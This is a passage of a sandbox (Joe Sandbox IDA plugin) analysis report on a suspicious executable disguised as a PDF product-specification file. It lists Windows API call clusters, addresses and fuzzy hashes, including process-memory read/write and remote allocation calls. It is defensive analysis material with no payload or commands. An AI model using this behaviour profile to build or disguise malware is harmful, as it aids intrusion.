                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCF38
                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00ABCF6F
                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCFB4
                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCFC8
                                                                                                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,00ABC21E,00000000), ref: 00ABCFF2
                                                                                                                Similarity
                                                                                                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3191363074-0
                                                                                                                • Opcode ID: e72b7a6e46efb4d0f9a3d46417899032d155a257559a102ba9449f6c0d0caa8e
                                                                                                                • Instruction ID: 3278724da843fcfaf21662cf350fd4040361507a6e9295ef702b3046c89e7d0e
                                                                                                                • Opcode Fuzzy Hash: e72b7a6e46efb4d0f9a3d46417899032d155a257559a102ba9449f6c0d0caa8e
                                                                                                                • Instruction Fuzzy Hash: 0E313871A00306AFDB20DFA5C984EBABBFDEB14365B1044AEF506D2142DB30AE41DB60
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA1915
                                                                                                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 00AA19C1
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?), ref: 00AA19C9
                                                                                                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 00AA19DA
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00AA19E2
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostSleep$RectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382505437-0
                                                                                                                • Opcode ID: bb20c21de79c7dc337932cfa97e4a3a0abe072f37a585cf19c4b295076e0eb9d
                                                                                                                • Instruction ID: 635c041711142e7b00aadc75e9ca3e108cf20929d9a2a8252ddc8a5c475d8cce
                                                                                                                • Opcode Fuzzy Hash: bb20c21de79c7dc337932cfa97e4a3a0abe072f37a585cf19c4b295076e0eb9d
                                                                                                                • Instruction Fuzzy Hash: 2731A071A00219FFCB04CFA8CD99AEF7BB5EB45325F104229F922AB2D1C7709955DB90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AD5745
                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AD579D
                                                                                                                • _wcslen.LIBCMT ref: 00AD57AF
                                                                                                                • _wcslen.LIBCMT ref: 00AD57BA
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AD5816
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 763830540-0
                                                                                                                • Opcode ID: 5b9a29b902366b556e734aa5a3da21a51c1f9bd6466aa59f373e01d40e2436bb
                                                                                                                • Instruction ID: 0a94871301e0976f3d5a327b656f215953ecb7c17f6cc1fe416447277dd0d6b3
                                                                                                                • Opcode Fuzzy Hash: 5b9a29b902366b556e734aa5a3da21a51c1f9bd6466aa59f373e01d40e2436bb
                                                                                                                • Instruction Fuzzy Hash: 47217E71D046189ADB209FB4CC85AEE7BB8FF04724F108617E92AEA2C0D7748A85CF51
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00AC0951
                                                                                                                • GetForegroundWindow.USER32 ref: 00AC0968
                                                                                                                • GetDC.USER32(00000000), ref: 00AC09A4
                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00AC09B0
                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00AC09E8
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: 7837020234a646207b1940c6f5aa4304768fbb45ff2117368ae11ddfd65df3ac
                                                                                                                • Instruction ID: 30a3dd7bcc194a3e7ba4edf0af96056a1affa8942aa3486721a073fd9144432e
                                                                                                                • Opcode Fuzzy Hash: 7837020234a646207b1940c6f5aa4304768fbb45ff2117368ae11ddfd65df3ac
                                                                                                                • Instruction Fuzzy Hash: D0216D39600214AFD704EFA5C984EAEBBF9EF48710F04806DE85A97362CB70EC05CB50
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00A7CDC6
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A7CDE9
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A7CE0F
                                                                                                                • _free.LIBCMT ref: 00A7CE22
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A7CE31
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 336800556-0
                                                                                                                • Opcode ID: fd5f0bb526da90b7f5470896ef064904e37ea681bfda9bd7deca0b96b7ed83bc
                                                                                                                • Instruction ID: 083b7cc144ac09ed78e29cbc5d2ad6889d552ae77807246dd9534fd9e467ad90
                                                                                                                • Opcode Fuzzy Hash: fd5f0bb526da90b7f5470896ef064904e37ea681bfda9bd7deca0b96b7ed83bc
                                                                                                                • Instruction Fuzzy Hash: 5C01D8726026157FA72157B66C48D7B7A6DDFC6BB1315C12EF909C7101EA608D0281B4
                                                                                                                APIs
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A59693
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00A596A2
                                                                                                                • BeginPath.GDI32(?), ref: 00A596B9
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00A596E2
                                                                                                                Similarity
                                                                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225163088-0
                                                                                                                • Opcode ID: b829c71c03b2c6bd6e25dd712a79aa78d18edb0e8433b00994194a1e7d03dcc6
                                                                                                                • Instruction ID: f556c0c50e5e4eabe53b16a9b3a58d4c96ec5b127c885b52e8e51f7f69525844
                                                                                                                • Opcode Fuzzy Hash: b829c71c03b2c6bd6e25dd712a79aa78d18edb0e8433b00994194a1e7d03dcc6
                                                                                                                • Instruction Fuzzy Hash: 59218330802306EBDB11DF68DC157EA7BB5BB103A6F908616F9219B1B1D774585ACFA0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 00A598CC
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00A598D6
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00A598E9
                                                                                                                • GetStockObject.GDI32(00000005), ref: 00A598F1
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Color$LongModeObjectStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860813098-0
                                                                                                                APIs
                                                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?,?,00AA035E), ref: 00AA002B
                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0046
                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0054
                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?), ref: 00AA0064
                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A9FF41,80070057,?,?), ref: 00AA0070
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                • String ID:
                                                                                                                • API String ID: 3897988419-0
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00AAE997
                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 00AAE9A5
                                                                                                                • Sleep.KERNEL32(00000000), ref: 00AAE9AD
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00AAE9B7
                                                                                                                • Sleep.KERNEL32 ref: 00AAE9F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                • String ID:
                                                                                                                • API String ID: 2833360925-0
                                                                                                                APIs
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AA1114
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1120
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA112F
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1136
                                                                                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AA114D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 842720411-0
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AA0FCA
                                                                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AA0FD6
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AA0FE5
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AA0FEC
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AA1002
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                APIs
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AA102A
                                                                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1036
                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1045
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA104C
                                                                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AA1062
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 44706859-0
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0324
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0331
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB033E
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB034B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0358
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00AB017D,?,00AB32FC,?,00000001,00A82592,?), ref: 00AB0365
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2962429428-0
                                                                                                                • Opcode ID: 27f50ddffdb03e7cdd4164d094f351cef26f997071d54862b1702e7c8bcdcd33
                                                                                                                • Instruction ID: 6789d01b7f330957a446d5d179db319398253570f57e8bb4e9a697bd21af5d13
                                                                                                                • Opcode Fuzzy Hash: 27f50ddffdb03e7cdd4164d094f351cef26f997071d54862b1702e7c8bcdcd33
                                                                                                                • Instruction Fuzzy Hash: 8401E272800B058FC7309F66D880843F7F9BF503153048A3FD19252932C370A944CF80
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A7D752
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7D764
                                                                                                                • _free.LIBCMT ref: 00A7D776
                                                                                                                • _free.LIBCMT ref: 00A7D788
                                                                                                                • _free.LIBCMT ref: 00A7D79A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: 79de9e748d299e02e673740068c2e93183b7fa040595ba3ef6434bbabf6fa4e5
                                                                                                                • Instruction ID: 48c9ce069347f3a37cbcddfdcf4b917810ec33f68e916e8e4e9d68a7ddba4a9e
                                                                                                                • Opcode Fuzzy Hash: 79de9e748d299e02e673740068c2e93183b7fa040595ba3ef6434bbabf6fa4e5
                                                                                                                • Instruction Fuzzy Hash: 8DF0EC32544204ABC625EB68FEC5D16BBEDBF94710B98C905F14DE7542CB20FC808664
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00AA5C58
                                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00AA5C6F
                                                                                                                • MessageBeep.USER32(00000000), ref: 00AA5C87
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00AA5CA3
                                                                                                                • EndDialog.USER32(?,00000001), ref: 00AA5CBD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 3c424b08c7a00f7a6429ed2ed649a0552a421814974bc08748e92aef1dd2493f
                                                                                                                • Instruction ID: 7bfbb5008504af89c66167125f5da54aeb0453e351cf7f308ebccb0e61c56595
                                                                                                                • Opcode Fuzzy Hash: 3c424b08c7a00f7a6429ed2ed649a0552a421814974bc08748e92aef1dd2493f
                                                                                                                • Instruction Fuzzy Hash: 4A01FE305007049BEB215F60DD4EFA677B8FF01715F40125AB543620E0D7F0D945CB54
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00A722BE
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A722D0
                                                                                                                • _free.LIBCMT ref: 00A722E3
                                                                                                                • _free.LIBCMT ref: 00A722F4
                                                                                                                • _free.LIBCMT ref: 00A72305
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: fc55b0d49974b199e853297f099097ea682e815415dc0b042c63332c488b4cc8
                                                                                                                • Instruction ID: 446e0d0294caf7fdcec31f21bd5443da20717392ba398a682a1ae885b19b6dff
                                                                                                                • Opcode Fuzzy Hash: fc55b0d49974b199e853297f099097ea682e815415dc0b042c63332c488b4cc8
                                                                                                                • Instruction Fuzzy Hash: 43F054724112108BC712BF68BD029987F64F768750B85CA16F519D32B1CF7504D29FE4
                                                                                                                APIs
                                                                                                                • EndPath.GDI32(?), ref: 00A595D4
                                                                                                                • StrokeAndFillPath.GDI32(?,?,00A971F7,00000000,?,?,?), ref: 00A595F0
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00A59603
                                                                                                                • DeleteObject.GDI32 ref: 00A59616
                                                                                                                • StrokePath.GDI32(?), ref: 00A59631
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: c27cc41240c486288002b8205f37f28448fbf4888ed627ac4c97d684169ec36a
                                                                                                                • Instruction ID: e546862a30522057eccea03be5d46116c30eebd67930841f1e75601e7c926eb6
                                                                                                                • Opcode Fuzzy Hash: c27cc41240c486288002b8205f37f28448fbf4888ed627ac4c97d684169ec36a
                                                                                                                • Instruction Fuzzy Hash: B4F03130006205DBDB129F59ED1C7A53B61B700372F84C215F9265A0F0DB30855BDF20
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __freea$_free
                                                                                                                • String ID: a/p$am/pm
                                                                                                                • API String ID: 3432400110-3206640213
                                                                                                                • Opcode ID: 9e001f8c4f8533da0f632507478791a926fcb918e48ab3d292667939e5e7aeed
                                                                                                                • Instruction ID: 4d6ecfcb41ca16dd2d07165a8085570f3fc37c6eaf76398c70cd55038393398e
                                                                                                                • Opcode Fuzzy Hash: 9e001f8c4f8533da0f632507478791a926fcb918e48ab3d292667939e5e7aeed
                                                                                                                • Instruction Fuzzy Hash: BAD1E031900206DADB689F6CCC95BFAB7F4EF05700F28C269E909AF651D3359D81CBA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A60242: EnterCriticalSection.KERNEL32(00B1070C,00B11884,?,?,00A5198B,00B12518,?,?,?,00A412F9,00000000), ref: 00A6024D
                                                                                                                  • Part of subcall function 00A60242: LeaveCriticalSection.KERNEL32(00B1070C,?,00A5198B,00B12518,?,?,?,00A412F9,00000000), ref: 00A6028A
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00A600A3: __onexit.LIBCMT ref: 00A600A9
                                                                                                                • __Init_thread_footer.LIBCMT ref: 00AC7BFB
                                                                                                                  • Part of subcall function 00A601F8: EnterCriticalSection.KERNEL32(00B1070C,?,?,00A58747,00B12514), ref: 00A60202
                                                                                                                  • Part of subcall function 00A601F8: LeaveCriticalSection.KERNEL32(00B1070C,?,00A58747,00B12514), ref: 00A60235
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                • API String ID: 535116098-3733170431
                                                                                                                • Opcode ID: dd00b9bdb6226c66cc24de2fb300fe1885e46f57e57f57794465ad84892d42aa
                                                                                                                • Instruction ID: dadfe429c74db3696d9bc6b17f8a72aff21590f55c782ce77fb6228ca1c0be94
                                                                                                                • Opcode Fuzzy Hash: dd00b9bdb6226c66cc24de2fb300fe1885e46f57e57f57794465ad84892d42aa
                                                                                                                • Instruction Fuzzy Hash: 51916A74A04209EFCB15EF98D991EADB7B1BF48300F51809DF8069B292DB71AE81CF51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AAB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AA21D0,?,?,00000034,00000800,?,00000034), ref: 00AAB42D
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AA2760
                                                                                                                  • Part of subcall function 00AAB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AA21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00AAB3F8
                                                                                                                  • Part of subcall function 00AAB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00AAB355
                                                                                                                  • Part of subcall function 00AAB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AA2194,00000034,?,?,00001004,00000000,00000000), ref: 00AAB365
                                                                                                                  • Part of subcall function 00AAB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AA2194,00000034,?,?,00001004,00000000,00000000), ref: 00AAB37B
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AA27CD
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AA281A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
